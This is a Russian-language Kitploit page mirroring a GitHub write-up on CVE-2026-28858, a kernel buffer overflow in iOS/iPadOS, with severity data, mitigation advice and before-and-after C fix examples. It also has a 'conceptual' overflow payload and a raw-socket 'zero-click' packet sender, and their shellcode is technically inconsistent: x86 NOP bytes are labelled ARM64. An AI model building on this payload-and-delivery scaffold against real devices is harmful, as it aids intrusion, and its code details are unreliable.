Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-28858 — Технический анализ CVE-2026-28858, критического переполнения буфера в ядре Apple iOS/iPadOS, включая поток эксплуатации, меры смягчения и примеры защитного кодирования. | Kitploit
Инструменты/GitHubGitHub/kaleth4/cve-2026-28858
Безопасность iOSАнализ уязвимостейЭксплуатацияМобильная безопасностьОбучение и ОбразованиеЭксплуатация Бинарных Файлов
GitHubkaleth4/cve-2026-28858

CVE-2026-28858

Технический анализ CVE-2026-28858, критического переполнения буфера в ядре Apple iOS/iPadOS, включая поток эксплуатации, меры смягчения и примеры защитного кодирования.

Репозиторий
4 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

⚠️ CVE-2026-28858 — Переполнение буфера в Apple iOS/iPadOS

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  СЕРЬЁЗНОСТЬ: КРИТИЧЕСКАЯ  │  CVSS: 9.8  │  CWE-120  │  УДАЛЁННО   ║
╚══════════════════════════════════════════════════════════════╝

Удалённый пользователь может вызвать неожиданное завершение работы системы или повреждение памяти ядра в iOS/iPadOS без взаимодействия с пользователем и без привилегий.


📋 Техническая карточка

ПолеЗначение
CVE IDCVE-2026-28858
EUVDEUVD-2026-15131
Опубликовано25 марта 2026 г.
Последнее обновление26 марта 2026 г.
CVSS v3.19.8 / 10 — КРИТИЧЕСКИЙ
EPSS0.05%
ВекторCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-120 — Копирование буфера без проверки размера
СтатусПроанализировано — Патч доступен

🎯 Описание

Переполнение буфера (Buffer Overflow) в Apple iOS и iPadOS, вызванное недостаточной проверкой границ при обработке входных данных ядра.

Реальное воздействие:

  • Отказ в обслуживании (сбой системы)
  • Повреждение памяти ядра
  • Потенциальное выполнение произвольного кода с привилегиями ядра
  • Zero-click: не требует взаимодействия с пользователем

⚡ Детали вектора атаки

ПараметрЗначениеОписание
Вектор атакиСетьЭксплуатируется удалённо
СложностьНизкаяБез особых условий
Требуемые привилегииНетАутентификация не требуется
Взаимодействие с пользователемНетZero-click
Область действияБез измененийОграничено уязвимым компонентом
КонфиденциальностьВысокаяПолный доступ к данным
ЦелостностьВысокаяПолная модификация возможна
ДоступностьВысокаяСбой системы

🔬 Технический анализ и пример кода

Публичного эксплойта для CVE-2026-28858 не существует. Нижеприведённое представление является концептуальным, основанным на CWE-120 и задокументированном векторе атаки.

1. Структура полезной нагрузки (Переполнение)

root@kitploit:~
# Концептуальное представление переполнения
import socket

# 1. Заполнение выделенного буфера (~512 байт типично для обработчиков ядра)
buffer_fill = b"A" * 512

# 2. Перезаписанный адрес возврата — указывает на зону, контролируемую атакующим
# В реальном iOS/iPadOS: требует обхода ASLR + PAC (Pointer Authentication Codes)
return_address = b"\x41\x42\x43\x44"

# 3. Шеллкод: NOP-слайд + вредоносные инструкции для ARM64
shellcode = b"\x90" * 16 + b"\xeb\x12..."  # NOP-слайд + полезная нагрузка

payload = buffer_fill + return_address + shellcode

2. Вектор доставки (Zero-Click)

root@kitploit:~
# Удалённая доставка без взаимодействия с пользователем
# Пример: сетевой пакет с манипулируемым полем длины

import struct

def craft_malicious_packet(target_ip: str, target_port: int):
    """
    Создаёт пакет с некорректными метаданными, которые ядро
    iOS обрабатывает в фоновом режиме (без пользовательского интерфейса).
    Напр.: TLS-сертификат, метаданные изображения, поле сетевого протокола.
    """
    # Легитимный заголовок протокола
    header = struct.pack(">HH", 0x0001, 0xFFFF)  # type=1, length=OVERFLOW

    # Полезная нагрузка, превышающая буфер ядра
    malicious_data = header + payload

    with socket.socket(socket.AF_INET, socket.SOCK_RAW) as s:
        s.sendto(malicious_data, (target_ip, target_port))

3. Выполнение в ядре (Поток эксплойта)

root@kitploit:~
[Сеть/WiFi/BT] → Некорректный пакет
      ↓
[Фоновый процесс iOS] → Читает поле "длина" = 0xFFFF
      ↓
[memcpy(буфер_ядра, данные, 0xFFFF)] → БЕЗ ПРОВЕРКИ ГРАНИЦ
      ↓
[Переполнение: шеллкод записан поверх стека/кучи ядра]
      ↓
[Процессор перенаправлен на return_address атакующего]
      ↓
[Выполнение с ring 0 / привилегиями ядра]

4. Уязвимый код против исправленного кода

root@kitploit:~
/* ❌ УЯЗВИМЫЙ КОД (до патча) */
void procesar_entrada(char *datos_usuario, size_t longitud) {
    char bufer_kernel[512];
    memcpy(bufer_kernel, datos_usuario, longitud); // БЕЗ проверки
}

/* ✅ ИСПРАВЛЕННЫЙ КОД (iOS/iPadOS 26.4) */
void procesar_entrada(char *datos_usuario, size_t longitud) {
    char bufer_kernel[512];

    // Проверка границ — исправление, применённое Apple
    if (longitud > sizeof(bufer_kernel)) {
        kernel_log("CVE-2026-28858: входные данные усечены [%zu > 512]", longitud);
        return; // Прервать до копирования
    }

    memcpy(bufer_kernel, datos_usuario, longitud);
}

5. Обнаружение с помощью Stack Canaries

root@kitploit:~
/* Механизм защиты в глубину: Stack Canary */
#include <string.h>

#define CANARY_VALUE 0xDEADBEEFCAFEBABE

void procesar_entrada_segura(char *datos_usuario, size_t longitud) {
    uint64_t canary = CANARY_VALUE;
    char bufer_seguro[512];

    if (longitud > sizeof(bufer_seguro)) {
        log_security_event("Попытка переполнения заблокирована");
        return;
    }

    memcpy(bufer_seguro, datos_usuario, longitud);

    // Проверка целостности канарейки после копирования
    if (canary != CANARY_VALUE) {
        panic("Обнаружено разрушение стека — CVE-2026-28858");
    }
}

🛡️ Смягчение последствий

Требуется немедленное действие:

root@kitploit:~
Обновиться до iOS 26.4 / iPadOS 26.4 или новее
  • Настройки → Основные → Обновление ПО
  • Применимо ко всем устройствам Apple с версиями старше 26.4
  • Действенного обходного пути не существует — эффективен только патч

📅 Хронология

root@kitploit:~
23 мар 2026  → Первичная публикация (EUVD)
24 мар 2026  → Опубликован бюллетень Apple #126792
24 мар 2026  → Обнаружено первое упоминание (Feedly)
24 мар 2026  → Оценка CVSS автоматическим анализом
25 мар 2026  → NVD присваивает CVSS 9.8 — Критический
25 мар 2026  → Обнаружение добавлено в Qualys (ID: 610773)
26 мар 2026  → Статус: Проанализировано

🖥️ Затронутые системы

Все версии iOS и iPadOS старше 26.4, включая:

  • iOS 1.0 → 26.3.x
  • iPadOS 12.1 → 26.3.x

Полный список затронутых CPE см. в справочной документации.


🔗 Ссылки

ИсточникURL
Бюллетень безопасности Applehttps://support.apple.com/en-us/126792
NVDhttps://nvd.nist.gov/vuln/detail/CVE-2026-28858
CWE-120https://cwe.mitre.org/data/definitions/120.html

⚠️ Связанная классификация CAPEC

  • CAPEC-100 — Переполнение буфера
  • CAPEC-10 — Переполнение через переменные окружения
  • CAPEC-14 — Переполнение буфера, вызванное клиентской инъекцией
  • CAPEC-8 — Переполнение буфера при вызове API
  • CAPEC-92 — Принудительное переполнение целых чисел

Дисклеймер: Представленный код является исключительно концептуальным представлением в образовательных целях и для защитных исследований. Публичного эксплойта для CVE-2026-28858 не существует.

Скачать инструмент